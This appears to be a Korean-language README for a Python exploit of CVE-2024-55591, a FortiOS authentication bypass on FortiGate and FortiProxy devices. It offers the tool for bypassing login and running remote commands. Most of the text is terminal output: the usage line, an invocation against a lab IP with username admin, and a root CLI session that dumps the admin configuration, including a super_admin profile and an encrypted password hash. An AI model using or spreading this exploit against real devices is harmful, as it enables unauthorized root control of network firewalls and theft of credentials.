
CVE-2024-55591를 위한 Python 익스플로잇, 취약한 FortiGate 및 FortiProxy 장치에서 FortiOS 인증을 우회하여 원격 명령을 실행합니다.
Fortinet FortiOS 인증 우회 취약점 익스플로잇
이 익스플로잇을 사용하면 인증을 우회하고 명령을 실행할 수 있습니다.
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t



sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
next
end